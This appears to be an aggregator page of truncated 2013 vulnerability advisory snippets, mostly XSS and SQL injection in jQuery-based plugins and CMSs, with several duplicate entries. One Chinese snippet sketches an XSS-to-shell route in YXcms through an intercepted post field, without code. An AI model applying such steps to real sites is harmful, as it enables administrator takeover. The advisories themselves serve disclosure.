CVE-2013-4383

CVE-2013-4383 describes a cross-site scripting (XSS) vulnerability in the jQuery Countdown module for Drupal (7.x-1.x). The root cause is insufficient sanitization of settings, allowing a user with the access administration pages permission to inject arbitrary script or HTML into a page via unspe...

Patched Microsoft Office 365 XSS Vulnerability Disclosed

A researcher in the UK disclosed the details of a serious cross-site scripting vulnerability in Office 365 that would allow an attacker with a mailbox on Office 365 to gain administrator rights over the Microsoft Web-based application in an organization. An exploit in an enterprise environment...

Cross site scripting

Cross-site scripting XSS vulnerability in Drupal 6.x before 6.28 and 7.x before 7.19, when running with older versions of jQuery that are vulnerable to CVE-2011-4969, allows remote attackers to inject arbitrary web script or HTML via vectors involving unspecified Javascript functions that are use...

CVE-2013-0244

Cross-site scripting XSS vulnerability in Drupal 6.x before 6.28 and 7.x before 7.19, when running with older versions of jQuery that are vulnerable to CVE-2011-4969, allows remote attackers to inject arbitrary web script or HTML via vectors involving unspecified Javascript functions that are use...

CVE-2013-0244

Cross-site scripting XSS vulnerability in Drupal 6.x before 6.28 and 7.x before 7.19, when running with older versions of jQuery that are vulnerable to CVE-2011-4969, allows remote attackers to inject arbitrary web script or HTML via vectors involving unspecified Javascript functions that are use...

YXcmsApp某处xss导致getshell

简要描述： xss到后台导致getshell一条龙服务不过略鸡肋。 详细说明： YXCMS是一款面向企业的内容管理系统，采用三级缓存，MVC架构以BSD协议开源。 注册了用户以后来到用户管理页面，点击信息发布 - 增加咨询，发现是一个富文本编辑器，kindeditor。不管是什么编辑器，既然给了一个用户这么大的权限，这种情况下很容易出现xss。 随便输入点什么东西，抓包，修改content字段内容，写你的xss代码，什么都行。 好了。管理员在后台就能看到我提交的文章： 然后编辑的话就能触发xss：...

CVE-2013-6837

Cross-site scripting XSS vulnerability in the setTimeout function in js/jquery.prettyPhoto.js in prettyPhoto 3.1.4 and earlier allows remote attackers to inject arbitrary web script or HTML via a crafted PATHINTO to the default URI...

CVE-2013-7129

Cross-site scripting XSS vulnerability in ThemeBeans Blooog theme 1.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the jQuery parameter to assets/js/jplayer.swf...

Cross site scripting

Cross-site scripting XSS vulnerability in ThemeBeans Blooog theme 1.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the jQuery parameter to assets/js/jplayer.swf...

JVN#28467717: Page Scroller vulnerable to cross-site scripting

Page Scroller from coliss is a script that uses jQuery. In addition to Page Scroller being avaliable just as a script, it is also available as a ZIP archive that includes jQuery and demo files. The jQuery included in the ZIP archive contains a known cross-site scripting vulnerability CVE-2011-496...

Pagelime CMS XSS / Credential Disclosure

================================================================================================================================================= PAGELIME CMS jQuery Cross Site Scripting / Unencrypted VIEWSTATE parameter / User credentials are sent in clear text / Login page password-guessing...

SA-CONTRIB-2013-076 - jQuery Countdown - Cross Site Scripting (XSS)

This jQuery Countdown Module enables you to display a countdown block based upon date settings. The jQuery Countdown Module does not properly sanitize the settings, allowing a malicious user to embed scripts within a page, resulting in a Cross-site Scripting XSS vulnerability. This vulnerability ...

CVE-2013-2022

Multiple cross-site scripting XSS vulnerabilities in actionscript/Jplayer.as in the Flash SWF component jplayer.swf in jPlayer before 2.2.23 allow remote attackers to inject arbitrary web script or HTML via the 1 jQuery or 2 id parameters, a different vulnerability than CVE-2013-1942 and...

UBUNTU-CVE-2013-2022

Multiple cross-site scripting XSS vulnerabilities in actionscript/Jplayer.as in the Flash SWF component jplayer.swf in jPlayer before 2.2.23 allow remote attackers to inject arbitrary web script or HTML via the 1 jQuery or 2 id parameters, a different vulnerability than CVE-2013-1942 and...

CVE-2013-2022

CVE-2013-2022 refers to multiple XSS vulnerabilities in the Flash SWF component jplayer.swf (jPlayer) within actionscript/Jplayer.as. Affected are jPlayer versions before 2.2.23, where remote attackers could inject arbitrary script or HTML via the (1) jQuery or (2) id parameters in the jplayer.sw...

Cross site scripting

Multiple cross-site scripting XSS vulnerabilities in actionscript/Jplayer.as in the Flash SWF component jplayer.swf in jPlayer before 2.2.20, as used in ownCloud Server before 5.0.4 and other products, allow remote attackers to inject arbitrary web script or HTML via the 1 jQuery or 2 id...

CVE-2013-1942

Multiple cross-site scripting XSS vulnerabilities in actionscript/Jplayer.as in the Flash SWF component jplayer.swf in jPlayer before 2.2.20, as used in ownCloud Server before 5.0.4 and other products, allow remote attackers to inject arbitrary web script or HTML via the 1 jQuery or 2 id...

CVE-2013-1942

Removed by vendor...

Sql injection

SQL injection vulnerability in the jQuery autocomplete for indexedsearch rzautocomplete extension before 0.0.9 for TYPO3 allows remote attackers to execute arbitrary SQL commands via unspecified vectors...

CVE-2013-4634

SQL injection vulnerability in the jQuery autocomplete for indexedsearch rzautocomplete extension before 0.0.9 for TYPO3 allows remote attackers to execute arbitrary SQL commands via unspecified vectors...